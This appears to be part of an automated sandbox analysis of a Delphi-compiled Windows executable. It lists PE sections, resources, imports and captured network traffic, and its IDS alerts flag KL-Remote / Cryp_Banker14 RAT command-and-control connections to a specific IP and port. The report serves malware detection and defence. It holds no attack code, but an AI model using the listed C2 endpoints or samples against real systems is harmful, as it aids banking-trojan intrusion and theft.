add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4c8000	0x6d	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4c3000	0x3bcc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x534000	0xb87600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4cb000	0x68d24	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4ca000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4c3a78	0x938	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4c7000	0xcba	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4a23cc	0x4a2400	f5f8ccda1a307202c6c7962e04af99d2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x4a4000	0x32b4	0x3400	28a473619959e8561758d252642b3183	False	0.5259164663461539	data	6.3031884940201675	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4a8000	0x12a84	0x12c00	930d0cb7a6adeaccbda21771572e6a2e	False	0.4514453125	data	5.254698117597858	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x4bb000	0x7bac	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x4c3000	0x3bcc	0x3c00	2a38558d252082e4fa9717c35f8fe828	False	0.3294270833333333	data	5.073982386819174	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x4c7000	0xcba	0xe00	65241c26d81e8679f0b722e763e353c2	False	0.3267299107142857	data	4.132414128380479	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x4c8000	0x6d	0x200	58c891240fa923bc27c6a3cdaf9979ad	False	0.171875	data	1.2878106550381676	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x4c9000	0x58	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x4ca000	0x5d	0x200	4b43cedfc39507543d7798c37294f9bd	False	0.189453125	data	1.383131954273433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4cb000	0x68d24	0x68e00	e7b8d97ed50e19b38175fa9966b51078	False	0.5448194465137068	data	6.701719733741433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x534000	0xb87600	0xb87600	932cd71749c3e8638c2ec7cd9a23da31	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x535ab0	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x535be4	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x535d18	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x535e4c	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x535f80	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x5360b4	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x5361e8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0x53631c	0x294	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	English	United States	1.0166666666666666
RT_ICON	0x5365b0	0x2fa	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	English	United States	1.0144356955380578
RT_ICON	0x5368ac	0x3ee	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	English	United States	1.010934393638171
RT_ICON	0x536c9c	0x596	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	English	United States	1.0076923076923077
RT_ICON	0x537234	0x6b8	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced	English	United States	1.0063953488372093
RT_ICON	0x5378ec	0x81f	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	English	United States	1.0052910052910053
RT_ICON	0x53810c	0x9f5	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0043154178109062
RT_ICON	0x538b04	0x1f1e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9713783580215918
RT_STRING	0x53aa24	0xa4	data			0.5975609756097561
RT_STRING	0x53aac8	0x52c	data			0.3716012084592145
RT_STRING	0x53aff4	0x598	data			0.3498603351955307
RT_STRING	0x53b58c	0x52c	data			0.23867069486404835
RT_STRING	0x53bab8	0x57c	data			0.297008547008547
RT_STRING	0x53c034	0x4ec	data			0.30873015873015874
RT_STRING	0x53c520	0x494	data			0.35921501706484643
RT_STRING	0x53c9b4	0x324	data			0.42039800995024873
RT_STRING	0x53ccd8	0x3c4	AmigaOS bitmap font "n", fc_YSize 30208, 18688 elements, 2nd "l", 3rd "e"			0.37655601659751037
RT_STRING	0x53d09c	0x3cc	data			0.43621399176954734
RT_STRING	0x53d468	0x744	data			0.27903225806451615
RT_STRING	0x53dbac	0x588	data			0.3114406779661017
RT_STRING	0x53e134	0x474	data			0.39649122807017545
RT_STRING	0x53e5a8	0x340	data			0.43509615384615385
RT_STRING	0x53e8e8	0x384	data			0.41888888888888887
RT_STRING	0x53ec6c	0x514	data			0.3607692307692308
RT_STRING	0x53f180	0x478	data			0.40646853146853146
RT_STRING	0x53f5f8	0x404	data			0.3861867704280156
RT_STRING	0x53f9fc	0x41c	data			0.34600760456273766
RT_STRING	0x53fe18	0x448	data			0.33667883211678834
RT_STRING	0x540260	0x57c	data			0.26282051282051283
RT_STRING	0x5407dc	0x3a8	data			0.4091880341880342
RT_STRING	0x540b84	0x574	data			0.3538681948424069
RT_STRING	0x5410f8	0xae4	data			0.2654232424677188
RT_STRING	0x541bdc	0x844	data			0.2939508506616257
RT_STRING	0x542420	0xf4c	data			0.21884576098059244
RT_STRING	0x54336c	0xb10	data			0.2891949152542373
RT_STRING	0x543e7c	0xa2c	data			0.3248847926267281
RT_STRING	0x5448a8	0x920	data			0.2833904109589041
RT_STRING	0x5451c8	0x710	data			0.3008849557522124
RT_STRING	0x5458d8	0x238	data			0.44190140845070425
RT_STRING	0x545b10	0x3e0	data			0.39919354838709675
RT_STRING	0x545ef0	0x5b8	data			0.34904371584699456
RT_STRING	0x5464a8	0x638	data			0.3806532663316583
RT_STRING	0x546ae0	0x3b0	data			0.4385593220338983
RT_STRING	0x546e90	0x470	data			0.3908450704225352
RT_STRING	0x547300	0x344	data			0.41148325358851673
RT_STRING	0x547644	0x420	data			0.4015151515151515
RT_STRING	0x547a64	0x39c	data			0.43614718614718617
RT_STRING	0x547e00	0x388	data			0.38716814159292035
RT_STRING	0x548188	0x364	data			0.3490783410138249
RT_STRING	0x5484ec	0x2c8	data			0.43820224719101125
RT_STRING	0x5487b4	0x434	data			0.3736059479553903
RT_STRING	0x548be8	0x384	data			0.3611111111111111
RT_STRING	0x548f6c	0x40c	data			0.4034749034749035
RT_STRING	0x549378	0x120	data			0.6215277777777778
RT_STRING	0x549498	0xd0	data			0.6778846153846154
RT_STRING	0x549568	0x198	data			0.5294117647058824
RT_STRING	0x549700	0x2dc	data			0.45491803278688525
RT_STRING	0x5499dc	0x3ac	data			0.39787234042553193
RT_STRING	0x549d88	0x3f4	data			0.38735177865612647
RT_STRING	0x54a17c	0x460	data			0.3794642857142857
RT_STRING	0x54a5dc	0x38c	data			0.30176211453744495
RT_STRING	0x54a968	0x374	data			0.4253393665158371
RT_STRING	0x54acdc	0x3d0	data			0.4077868852459016
RT_STRING	0x54b0ac	0x660	data			0.3449754901960784
RT_STRING	0x54b70c	0x438	data			0.3685185185185185
RT_STRING	0x54bb44	0x46c	data			0.3197879858657244
RT_STRING	0x54bfb0	0x334	data			0.4097560975609756
RT_STRING	0x54c2e4	0x328	data			0.35396039603960394
RT_STRING	0x54c60c	0x44c	data			0.3927272727272727
RT_STRING	0x54ca58	0x1ec	data			0.3983739837398374
RT_STRING	0x54cc44	0xc4	data			0.6428571428571429
RT_STRING	0x54cd08	0x150	data			0.5744047619047619
RT_STRING	0x54ce58	0x3e8	data			0.408
RT_STRING	0x54d240	0x498	data			0.29336734693877553
RT_STRING	0x54d6d8	0x2f8	data			0.45263157894736844
RT_STRING	0x54d9d0	0x2f0	data			0.3776595744680851
RT_STRING	0x54dcc0	0x368	data			0.29243119266055045
RT_RCDATA	0x54e028	0xd5d	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0032154340836013
RT_RCDATA	0x54ed88	0xd57	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003221083455344
RT_RCDATA	0x54fae0	0xcfc	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003309265944645
RT_RCDATA	0x5507dc	0xcd9	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033444816053512
RT_RCDATA	0x5514b8	0xd5d	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0032154340836013
RT_RCDATA	0x552218	0xd57	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003221083455344
RT_RCDATA	0x552f70	0xc4e	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0034920634920634
RT_RCDATA	0x553bc0	0xc4e	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0034920634920634
RT_RCDATA	0x554810	0xcb5	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033814940055334
RT_RCDATA	0x5554c8	0xcb0	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033866995073892
RT_RCDATA	0x556178	0xd56	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0032220269478618
RT_RCDATA	0x556ed0	0xd47	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0032362459546926
RT_RCDATA	0x557c18	0xdc2	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0031232254400908
RT_RCDATA	0x5589dc	0xdc5	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0031205673758865
RT_RCDATA	0x5597a4	0xcf3	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003318250377074
RT_RCDATA	0x55a498	0xced	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033242671501965
RT_RCDATA	0x55b188	0xda9	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0031455533314269
RT_RCDATA	0x55bf34	0xda6	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0031482541499714
RT_RCDATA	0x55ccdc	0xcf3	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003318250377074
RT_RCDATA	0x55d9d0	0xced	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033242671501965
RT_RCDATA	0x55e6c0	0x10	data			1.5
RT_RCDATA	0x55e6d0	0x148b	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0020916524054002
RT_RCDATA	0x55fb5c	0x111e	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0025102692834322
RT_RCDATA	0x560c7c	0xd8c	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0031718569780854
RT_RCDATA	0x561a08	0x1394	data			0.47186751795690346
RT_RCDATA	0x562d9c	0x4	data	English	United States	3.0
RT_RCDATA	0x562da0	0xb16	Delphi compiled form 'TForm1'			0.42353770260747003
RT_RCDATA	0x5638b8	0x947bdb	Delphi compiled form 'TForm2'			0.033049583435058594
RT_RCDATA	0xeab494	0x1601	Delphi compiled form 'TForm3'			0.307651340315995
RT_RCDATA	0xeaca98	0x20e034	Delphi compiled form 'TForm4'			0.04551410675048828
RT_GROUP_CURSOR	0x10baacc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x10baae0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x10baaf4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x10bab08	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x10bab1c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x10bab30	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x10bab44	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x10bab58	0x76	data	English	United States	0.7033898305084746
RT_VERSION	0x10babd0	0x204	data	English	United States	0.4903100775193798
RT_MANIFEST	0x10badd4	0x70b	XML 1.0 document, ASCII text, with CRLF, LF line terminators	English	United States	0.403771491957848

Imports

DLL	Import
wininet.dll	InternetCloseHandle, InternetReadFile, InternetOpenW, InternetOpenUrlW
winspool.drv	DocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
comctl32.dll	ImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
shell32.dll	Shell_NotifyIconW, SHAppBarMessage, ShellExecuteW
user32.dll	MoveWindow, CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, ClipCursor, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, SetSystemCursor, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, GetWindowTextLengthW, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, mouse_event, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, keybd_event, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, ValidateRect, IsCharAlphaW, GetCursor, KillTimer, BeginDeferWindowPos, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, CreateWindowExW, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, MonitorFromRect, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, VkKeyScanW, DestroyMenu, SetWindowsHookExW, EmptyClipboard, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, SetKeyboardState, GetKeyboardState, ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, CountClipboardFormats, CloseClipboard, DestroyCursor, CopyIcon, PostQuitMessage, ShowScrollBar, EnableMenuItem, DeferWindowPos, HideCaret, EndDeferWindowPos, FindWindowExW, MonitorFromPoint, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll	SafeArrayPutElement, SafeArrayDestroy, SetErrorInfo, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SafeArrayAccessData, SysReAllocStringLen, SafeArrayCreate, CreateErrorInfo, SafeArrayGetElement, SysAllocStringLen, SafeArrayUnaccessData, SafeArrayPtrOfIndex, SafeArrayGetElemsize, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopyInd, VariantChangeType, SafeArrayCopy
WTSAPI32.DLL	WTSUnRegisterSessionNotification, WTSRegisterSessionNotification
advapi32.dll	RegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegQueryValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
msvcrt.dll	memcpy, memset
kernel32.dll	SetFileAttributesW, GetFileTime, GetFileType, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, GetFileAttributesExW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, GlobalFree, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, SetCurrentDirectoryW, GetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, WinExec, GetVersionExW, VerifyVersionInfoW, HeapCreate, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, EnumResourceNamesW, DeleteFileW, IsDBCSLeadByteEx, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
wsock32.dll	gethostbyaddr, WSACleanup, gethostbyname, bind, gethostname, closesocket, WSAGetLastError, connect, inet_addr, getpeername, WSAAsyncSelect, WSAAsyncGetServByName, WSACancelAsyncRequest, send, ntohs, htons, WSAStartup, getservbyname, getsockname, listen, socket, recv, inet_ntoa, ioctlsocket, WSAAsyncGetHostByName
ole32.dll	IsEqualGUID, OleInitialize, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
gdi32.dll	Pie, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, SelectClipRgn, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, PolyBezierTo, CreateICW, CreateDCW, GetStockObject, CreateSolidBrush, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, CreateFontIndirectW, PolyBezier, EndDoc, GetObjectW, GetWinMetaFileBits, SetROP2, GetEnhMetaFileDescriptionW, ArcTo, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, Rectangle, SaveDC, DeleteDC, FrameRgn, BitBlt, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, SetWinMetaFileBits, CombineRgn, GetStretchBltMode, CreateDIBitmap, SetStretchBltMode, GetDIBits, CreateDIBSection, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries
Magnification.dll	MagSetWindowSource, MagInitialize, MagSetImageScalingCallback, MagSetWindowFilterList

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x412dcc
dbkFCallWrapperAddr	1	0x8be644

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-19T20:36:17.886678+0100	2020315	ET MALWARE KL-Remote / Cryp_Banker14 RAT connection	1	192.168.2.7	49707	24.152.39.13	55417	TCP
2024-11-19T20:36:18.601634+0100	2020316	ET MALWARE KL-Remote / Cryp_Banker14 RAT response	1	24.152.39.13	55417	192.168.2.7	49707	TCP

Network Port Distribution

Total Packets: 25
• 55417 undefined
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2024 20:36:12.193453074 CET	49701	80	192.168.2.7	104.237.62.213
Nov 19, 2024 20:36:12.198350906 CET	80	49701	104.237.62.213	192.168.2.7
Nov 19, 2024 20:36:12.198424101 CET	49701	80	192.168.2.7	104.237.62.213
Nov 19, 2024 20:36:12.198534012 CET	49701	80	192.168.2.7	104.237.62.213
Nov 19, 2024 20:36:12.203464985 CET	80	49701	104.237.62.213	192.168.2.7
Nov 19, 2024 20:36:12.784324884 CET	80	49701	104.237.62.213	192.168.2.7
Nov 19, 2024 20:36:12.789654970 CET	49701	80	192.168.2.7	104.237.62.213
Nov 19, 2024 20:36:12.804812908 CET	80	49701	104.237.62.213	192.168.2.7
Nov 19, 2024 20:36:12.804873943 CET	49701	80	192.168.2.7	104.237.62.213
Nov 19, 2024 20:36:14.645380974 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:36:14.650243044 CET	80	49702	154.205.156.20	192.168.2.7
Nov 19, 2024 20:36:14.650414944 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:36:14.650507927 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:36:14.655545950 CET	80	49702	154.205.156.20	192.168.2.7
Nov 19, 2024 20:36:15.313024044 CET	80	49702	154.205.156.20	192.168.2.7
Nov 19, 2024 20:36:15.313102007 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:36:17.545587063 CET	49705	55417	192.168.2.7	24.152.39.13
Nov 19, 2024 20:36:17.557590961 CET	55417	49705	24.152.39.13	192.168.2.7
Nov 19, 2024 20:36:17.557662010 CET	49705	55417	192.168.2.7	24.152.39.13
Nov 19, 2024 20:36:17.881633043 CET	49707	55417	192.168.2.7	24.152.39.13
Nov 19, 2024 20:36:17.886504889 CET	55417	49707	24.152.39.13	192.168.2.7
Nov 19, 2024 20:36:17.886565924 CET	49707	55417	192.168.2.7	24.152.39.13
Nov 19, 2024 20:36:17.886677980 CET	49707	55417	192.168.2.7	24.152.39.13
Nov 19, 2024 20:36:17.891702890 CET	55417	49707	24.152.39.13	192.168.2.7
Nov 19, 2024 20:36:18.601634026 CET	55417	49707	24.152.39.13	192.168.2.7
Nov 19, 2024 20:36:18.601947069 CET	49707	55417	192.168.2.7	24.152.39.13
Nov 19, 2024 20:36:18.606892109 CET	55417	49707	24.152.39.13	192.168.2.7
Nov 19, 2024 20:36:18.772856951 CET	55417	49707	24.152.39.13	192.168.2.7
Nov 19, 2024 20:36:18.959151983 CET	49707	55417	192.168.2.7	24.152.39.13
Nov 19, 2024 20:36:20.317301989 CET	80	49702	154.205.156.20	192.168.2.7
Nov 19, 2024 20:36:20.317383051 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:38:04.626252890 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:38:04.929569006 CET	49702	80	192.168.2.7	154.205.156.20
